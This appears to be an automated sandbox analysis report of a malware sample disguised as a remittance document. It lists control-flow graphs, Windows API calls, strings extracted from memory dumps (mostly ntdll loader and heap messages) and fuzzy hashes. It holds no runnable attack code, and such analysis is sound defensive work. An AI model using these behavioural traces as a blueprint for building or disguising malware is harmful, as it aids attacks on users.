                                            control_flow_graph 14 413af4-413af8 15 413b77-413b81 14->15 16 413afa-413b0a 14->16 17 413ba3-413ba8 15->17 18 413b83-413b94 PostThreadMessageW 15->18 18->17 19 413b96-413ba0 18->19 19->17
                                            APIs
                                            • PostThreadMessageW.USER32(Y656-D6L1,00000111,00000000,00000000), ref: 00413B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: Y656-D6L1$Y656-D6L1
                                            • API String ID: 1836367815-3972793824

                                            Control-flow Graph

                                            control_flow_graph 38 42b403-42b444 call 404493 call 42c153 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B43F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: qbA
                                            • API String ID: 3298025750-4234322774

                                            Control-flow Graph

                                            control_flow_graph 65 42b3b3-42b3f4 call 404493 call 42c153 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(?,0041DCFB,?,?,00000000,?,0041DCFB,?,?,?), ref: 0042B3EF
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0

                                            Control-flow Graph

                                            control_flow_graph 75 42b453-42b489 call 404493 call 42c153 ExitProcess
                                            APIs
                                            • ExitProcess.KERNEL32(?,00000000,?,?,5834D729,?,?,5834D729), ref: 0042B484
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0

                                            Control-flow Graph

                                            control_flow_graph 80 17d2c0a-17d2c0f 81 17d2c1f-17d2c26 LdrInitializeThunk 80->81 82 17d2c11-17d2c18 80->82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            Strings
                                            • double initialized or corrupted critical section, xrefs: 01805508
                                            • Address of the debug info found in the active list., xrefs: 018054AE, 018054FA
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01805543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054E2
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0180540A, 01805496, 01805519
                                            • Thread identifier, xrefs: 0180553A
                                            • Critical section address., xrefs: 01805502
                                            • undeleted critical section in freed memory, xrefs: 0180542B
                                            • Critical section address, xrefs: 01805425, 018054BC, 01805534
                                            • Critical section debug info address, xrefs: 0180541F, 0180552E
                                            • 8, xrefs: 018052E3
                                            • Invalid debug info address of this critical section, xrefs: 018054B6
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054CE
                                            • corrupted critical section, xrefs: 018054C2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            Strings
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0180261F
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018024C0
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01802498
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01802409
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01802624
                                            • @, xrefs: 0180259B
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01802602
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01802412
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018022E4
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01802506
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018025EB
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            Strings
                                            • VerifierFlags, xrefs: 01818C50
                                            • HandleTraces, xrefs: 01818C8F
                                            • VerifierDebug, xrefs: 01818CA5
                                            • VerifierDlls, xrefs: 01818CBD
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01818A3D
                                            • AVRF: -*- final list of providers -*- , xrefs: 01818B8F
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01818A67
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            Strings
                                            • LdrpInitShimEngine, xrefs: 017E99F4, 017E9A07, 017E9A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017E9A2A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017E99ED
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017E9A01
                                            • apphelp.dll, xrefs: 01786496
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017E9A11, 017E9A3A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            Strings
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0180219F
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01802180
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01802178
                                            • SXS: %s() passed the empty activation context, xrefs: 01802165
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018021BF
                                            • RtlGetAssemblyStorageRoot, xrefs: 01802160, 0180219A, 018021BA
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            Strings
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018081E5
                                            • LdrpInitializeProcess, xrefs: 017CC6C4
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01808181, 018081F5
                                            • LdrpInitializeImportRedirection, xrefs: 01808177, 018081EB
                                            • Loading import redirection DLL: '%wZ', xrefs: 01808170
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017CC6C3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            APIs
                                              • Part of subcall function 017D2DF0: LdrInitializeThunk.NTDLL ref: 017D2DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D74
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            Strings
                                            • LdrpInitializeProcess, xrefs: 017C8422
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017C855E
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017C8421
                                            • @, xrefs: 017C8591
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            Strings
                                            • .Local, xrefs: 017C28D8
                                            • SXS: %s() passed the empty activation context, xrefs: 018021DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018022B6
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018021D9, 018022B1
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            Strings
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01803437
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0180342A
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01803456
                                            • RtlDeactivateActivationContext, xrefs: 01803425, 01803432, 01803451
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017F106B
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017F10AE
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017F1028
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017F0FE5
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            Strings
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017FA992
                                            • LdrpDynamicShimModule, xrefs: 017FA998
                                            • apphelp.dll, xrefs: 017B2462
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017FA9A2
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            Strings
                                            • HEAP[%wZ]: , xrefs: 017A3255
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017A327D
                                            • HEAP: , xrefs: 017A3264
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: $@
                                            • API String ID: 0-1077428164
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            Strings
                                            • LdrpCheckModule, xrefs: 017FA117
                                            • Failed to allocated memory for shimmed module list, xrefs: 017FA10F
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017FA121
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            Strings
                                            • Failed to reallocate the system dirs string !, xrefs: 018082D7
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018082DE
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018082E8
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            Strings
                                            • PreferredUILanguages, xrefs: 0184C212
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0184C1C5
                                            • @, xrefs: 0184C1F1
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01814888
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01814899
                                            • LdrpCheckRedirection, xrefs: 0181488F
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            Strings
                                            • LdrpInitializationFailure, xrefs: 018120FA
                                            • Process initialization failed with status 0x%08lx, xrefs: 018120F3
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01812104
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            Strings
                                            • LdrResSearchResource Enter, xrefs: 0179AA13
                                            • LdrResSearchResource Exit, xrefs: 0179AA25
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            Strings
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            Strings
                                            • kLsE, xrefs: 01790540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0179063D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            Strings
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0179A309
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0179A2FB
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0181895E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75f7dacea9a4fc0b36efc2f6911e42be4d61aa103509a0e8dbeea927f9e6599b
                                            • Instruction ID: 32d382441c2afba270526815006feda060f0dd3305c0702d469596ad69e133b0
                                            • Opcode Fuzzy Hash: 75f7dacea9a4fc0b36efc2f6911e42be4d61aa103509a0e8dbeea927f9e6599b
                                            • Instruction Fuzzy Hash: B5A1E532E006199FEB219B6CC888BEEFBB4AB01714F050169EB11AB391DB749D41CBD1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
